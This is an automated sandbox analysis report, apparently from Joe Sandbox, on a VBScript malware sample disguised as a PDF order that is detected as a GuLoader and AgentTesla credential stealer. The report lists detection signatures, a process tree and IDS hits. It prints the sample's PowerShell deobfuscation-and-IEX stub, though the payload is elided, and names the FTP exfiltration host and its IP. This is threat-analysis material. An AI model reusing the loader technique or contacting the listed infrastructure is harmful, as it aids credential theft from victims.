Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name:Ordine n.47201 pdf.vbs
Analysis ID:755275
MD5:c8290bc8659c4a6a45ccd1af9268e400
SHA1:d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256:f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags:agentteslavbs

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5780 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5864 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """[obfuscated string elided]""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
Source:Ordine n.47201 pdf.vbs
Rule:WScript_Shell_PowerShell_Combo
Description:Detects malware from Middle Eastern campaign reported by Talos
Author:Florian Roth
Strings:
  • 0xa36:$s1: .CreateObject("WScript.Shell")
  • 0x3cde2:$p1: powershell.exe
  • 0x49c55:$p1: powershell.exe

Source:00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp
Rule:JoeSecurity_AgentTesla_1
Description:Yara detected AgentTesla
Author:Joe Security

Source:00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp
Rule:JoeSecurity_CredentialStealer
Description:Yara detected Credential Stealer
Author:Joe Security

Source:00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp
Rule:JoeSecurity_GuLoader_2
Description:Yara detected GuLoader
Author:Joe Security

Source:amsi64_5812.amsi.csv
Rule:WScript_Shell_PowerShell_Combo
Description:Detects malware from Middle Eastern campaign reported by Talos
Author:Florian Roth
Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1db:$p1: powershell.exe

Data Obfuscation

Source: Process started
Author: Joe Security
Data:
  Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
  CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
  ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """[obfuscated string elided; truncated in the report]
Source IP:192.168.2.7
Destination IP:185.31.121.136
Source Port:49726
Destination Port:61313
Protocol:TCP
SID:2851779
Timestamp:11/28/22-14:53:16.335427
Classtype:A Network Trojan was detected

Source IP:192.168.2.7
Destination IP:185.31.121.136
Source Port:49725
Destination Port:21
Protocol:TCP
SID:2029927
Timestamp:11/28/22-14:53:16.290035
Classtype:A Network Trojan was detected

AV Detection

Source: ftp.mcmprint.net
Virustotal: Detection: 9%